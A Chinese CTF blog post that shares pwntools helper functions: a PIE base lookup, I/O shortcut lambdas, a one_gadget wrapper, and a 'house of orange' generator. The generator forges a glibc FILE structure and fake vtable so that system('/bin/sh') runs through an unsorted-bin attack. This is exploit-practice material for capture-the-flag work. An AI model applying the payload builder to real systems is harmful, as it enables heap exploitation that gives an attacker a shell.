造轮子

  1. 前言
  2. 获取开pie程序的基地址:
  3. house of orange 快速生成payload
  4. 简化IO交互
  5. onegadget

前言

造一些轮子来简化一些pwn相关的操作,其实并不复杂,连偷带编造出了一些,慢慢会往里添加更多。

获取开pie程序的基地址:

传入process的那个类,就能得到基地址,方便调试。

def get_proc_base(p):
    proc_base = p.libs()[p._cwd+p.argv[0].strip('.')]
    return proc_base

house of orange 快速生成payload

主要参考了:https://xz.aliyun.com/t/2411#toc-3

只需要libclibc基地址,然后从unsortedbinpre_size开始写的payload

def pack_file(_flags = 0,
              _IO_read_ptr = 0,
              _IO_read_end = 0,
              _IO_read_base = 0,
              _IO_write_base = 0,
              _IO_write_ptr = 0,
              _IO_write_end = 0,
              _IO_buf_base = 0,
              _IO_buf_end = 0,
              _IO_save_base = 0,
              _IO_backup_base = 0,
              _IO_save_end = 0,
              _IO_marker = 0,
              _IO_chain = 0,
              _fileno = 0,
              _lock = 0,
              _wide_data = 0,
              _mode = 0):
    file_struct = p32(_flags) + \
             p32(0) + \
             p64(_IO_read_ptr) + \
             p64(_IO_read_end) + \
             p64(_IO_read_base) + \
             p64(_IO_write_base) + \
             p64(_IO_write_ptr) + \
             p64(_IO_write_end) + \
             p64(_IO_buf_base) + \
             p64(_IO_buf_end) + \
             p64(_IO_save_base) + \
             p64(_IO_backup_base) + \
             p64(_IO_save_end) + \
             p64(_IO_marker) + \
             p64(_IO_chain) + \
             p32(_fileno)
    file_struct = file_struct.ljust(0x88, "\x00")
    file_struct += p64(_lock)
    file_struct = file_struct.ljust(0xa0, "\x00")
    file_struct += p64(_wide_data)
    file_struct = file_struct.ljust(0xc0, '\x00')
    file_struct += p64(_mode)
    file_struct = file_struct.ljust(0xd8, "\x00")
    return file_struct


def pack_file_flush_str_jumps(_IO_str_jumps_addr, _IO_list_all_ptr, system_addr, binsh_addr):
    payload = pack_file(_flags = 0,
                        _IO_read_ptr = 0x61, #smallbin4file_size
                        _IO_read_base = _IO_list_all_ptr-0x10, # unsorted bin attack _IO_list_all_ptr,
                        _IO_write_base = 0,
                        _IO_write_ptr = 1,
                        _IO_buf_base = binsh_addr,
                        _mode = 0,
                       )
    payload += p64(_IO_str_jumps_addr-8)  # vtable
    payload += p64(0) # paddding
    payload += p64(system_addr)
    return payload


def get_io_str_jumps_offset(libc):
    IO_file_jumps_offset = libc.sym['_IO_file_jumps']
    IO_str_underflow_offset = libc.sym['_IO_str_underflow']
    for ref_offset in libc.search(p64(IO_str_underflow_offset)):
        possible_IO_str_jumps_offset = ref_offset - 0x20
        if possible_IO_str_jumps_offset > IO_file_jumps_offset:
            # print possible_IO_str_jumps_offset
            return possible_IO_str_jumps_offset


def house_of_orange_payload(libc, libc_base):
    io_str_jump = libc_base + get_io_str_jumps_offset(libc)
    io_list_all = libc_base + libc.symbols['_IO_list_all']
    system = libc_base + libc.symbols['system']
    bin_sh = libc_base + next(libc.search('/bin/sh'))
    payload = pack_file_flush_str_jumps(io_str_jump, io_list_all, system, bin_sh)
    return payload

简化IO交互

这个其实好多人都在用,直接给封装了,用的时候代码量就更少了:

ru,sn,rl,sl,rv,sa,sla,slog,flog = simple_io(p)
def simple_io(p):
    ru = lambda x : p.recvuntil(x)
    sn = lambda x : p.send(x)
    rl = lambda   : p.recvline()
    sl = lambda x : p.sendline(x)
    rv = lambda x : p.recv(x)
    sa = lambda a,b : p.sendafter(a,b) 
    sla = lambda a,b : p.sendlineafter(a, b)
    slog = lambda x : log.success(x)
    flog = lambda x : log.success(x)
    return ru,sn,rl,sl,rv,sa,sla,slog,flog

虽然这样代码量少了不少,不过有时候会遇到一些莫名其妙的问题。

onegadget

之前每次都要自己去跑一下工具,然后再记下来很麻烦,从作者的github上看到可以直接运行成代码:

def one_gadget(filename):
    return map(int, subprocess.check_output(['one_gadget', '--raw', filename]).split(' '))

返回的是一个list对象。

。。。待续


connect 1037178204@qq.com

文章标题:造轮子

本文作者:t1an5t

发布时间:2019-06-19, 15:40:33

最后更新:2020-02-05, 20:49:22

原始链接:http://yoursite.com/%E9%80%A0%E8%BD%AE%E5%AD%90/

版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。

目录